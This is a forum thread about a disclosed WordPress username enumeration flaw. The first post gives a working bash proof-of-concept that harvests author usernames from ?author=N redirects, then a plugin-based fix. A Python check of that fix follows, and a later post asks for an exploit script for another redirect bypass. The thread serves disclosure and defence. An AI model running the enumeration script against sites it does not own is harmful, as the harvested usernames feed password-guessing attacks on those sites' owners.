Thread: wordpress username enumeration PoC bash

  1. #1 Security Researcher, Pune, Maharashtra, India (joined May 2011, 237 posts, 1 blog entry)

    wordpress username enumeration PoC bash

    Hi All,

    We have recently seen a WordPress username enumeration vulnerability disclosure here: http://seclists.org/fulldisclosure/2011/May/493

    Versions affected are: 2.6, 3.1, 3.1.1, 3.1.3

    OK, so let's see what this vulnerability is all about.

    WordPress by default allows a simple redirection:

    http://site_name/?author=1
    will redirect to
    http://site_name/author/user_name_author
    and this redirection is a 301 redirect.

    Now you get the user page, either a user profile page or a list of the user's posts.

    So we can extract the username from two places:
    1) the title of the HTML page -> needs the whole HTML to be loaded.
    2) the redirect URL -> quick and easy.

    Here I am enclosing a simple PoC which can be run in a Bash shell.
    (Note: a PoC in Python is already available for those who are curious.)

    Code:
    #!/bin/bash
    # WordPress User Enumeration PoC by Anant Shrivastava
    # Disclosure : http://seclists.org/fulldisclosure/2011/May/493
    if [ $# -ne 1 ]
    then
        echo "Wordpress username enumeration PoC"
        echo "based on disclosure @ : http://seclists.org/fulldisclosure/2011/May/493 "
        echo "$0" "URL of Website"
    else
        count=1
        title=0
        while [ "$count" -lt 10 ]
        do
            # Headers only (-I): the 301 Location header carries the author slug
            result=$(curl -I -s --max-time 30 --max-filesize 1 "$1?author=$count" | grep -F 'Location:')
            # The username is the second-to-last path segment of the Location URL
            name=$(echo "$result" | rev | cut -f2 -d"/" | rev)
            if [ -n "$result" ]
            then
                if [ "$title" -eq 0 ]
                then
                    echo "ID : UserName"
                    title=1
                fi
                echo "$count : $name"
            fi
            count=$((count + 1))
        done
        if [ "$title" -eq 0 ]
        then
            echo "Either this site is not vulnerable or is not using wordpress hosted"
        fi
    fi
    Originally posted: http://blog.anantshri.info/wordpress...-shell-script/

    After creating the PoC, my own site was also susceptible to this attack, and hence I was looking for a fix and found an old friend of mine to the rescue.

    So here is how you can patch it.

    I am right now using a WordPress plugin: Redirection
    https://wordpress.org/extend/plugins/redirection/

    Inside the plugin page, which comes under: Tools -> Redirections

    Add a new rule with the following settings.

    Source URL : ^(.*)/?author=(.*)
    Target URL : /
    RegExp : Yes
    Match : URL only
    Action : Redirect to URL

    and click Add Redirection.

    All done... just try any URL with ?author=no

    Now this URL will be redirected back to your main page, effectively nullifying the user name enumeration.
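A defender-side check for the fix above, added here as an example and not code from the post, the blog, or the Redirection plugin: it classifies a captured Location header from a ?author=N request as either still leaking an author slug or safely redirected to the front page, and it runs the rule's regex against sample request URLs to show what the rule catches. The regex is evaluated with Python's re module, which is an assumption about how the plugin applies it; all sample URLs and headers are constructed. Because the pattern has nothing anchoring the text before author=, it also matches any URL whose query merely contains that substring (for example a search query), which is worth knowing before deploying it on a busy site.

```python
import re
from typing import Dict, Optional
from urllib.parse import urlsplit

# The Source URL regex exactly as entered in the Redirection rule from the post.
# Assumption: the plugin evaluates it like a standard PCRE on the request URL.
AUTHOR_RULE = re.compile(r"^(.*)/?author=(.*)")

# Shape of the WordPress author archive path the 301 points to: /author/<slug>/
AUTHOR_ARCHIVE = re.compile(r"^/author/([^/]+)/?$")


def rule_matches(request_url: str) -> bool:
    """True if the Redirection rule would fire for this request path+query."""
    return AUTHOR_RULE.search(request_url) is not None


def leaked_author(location_header: str) -> Optional[str]:
    """Given the Location header value returned for ?author=N, return the
    author slug it exposes, or None if the redirect no longer points at an
    author archive (e.g. it now goes to the front page)."""
    path = urlsplit(location_header.strip()).path
    m = AUTHOR_ARCHIVE.match(path)
    return m.group(1) if m else None


def check_site(responses: Dict[int, str]) -> Dict[int, str]:
    """responses maps author id -> Location header captured for ?author=<id>.
    Returns only the ids whose redirect still leaks a slug; after a working
    fix this should be empty."""
    leaks: Dict[int, str] = {}
    for author_id, location in responses.items():
        slug = leaked_author(location)
        if slug:
            leaks[author_id] = slug
    return leaks


# Constructed sample headers: what a vulnerable site returns before the rule...
BEFORE_FIX = {
    1: "http://example.com/author/admin/",
    2: "http://example.com/author/editor-jane/",
    3: "http://example.com/",  # id 3 does not exist; WordPress sends you home
}
# ...and what every ?author=N request returns once the rule redirects to /.
AFTER_FIX = {1: "http://example.com/", 2: "http://example.com/", 3: "http://example.com/"}

if __name__ == "__main__":
    print("before fix, leaking ids:", check_site(BEFORE_FIX))
    print("after fix, leaking ids:", check_site(AFTER_FIX))
    for url in ("/?author=1", "/author/admin/", "/?s=author=x"):
        print(f"rule fires for {url!r}: {rule_matches(url)}")
```

Run it against headers you captured from your own site after adding the rule; an empty result from check_site is what you want, and the third sample URL shows the over-broad match on an unrelated search query.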

  2. #2

    Bash for WordPress redirect.

    Could you please tell me how to write a bash or Python script to implement the WordPress 4.5.2 redirect bypass vulnerability.
    Link: https://wpvulndb.com/vulnerabilities/8522


    Thank You.
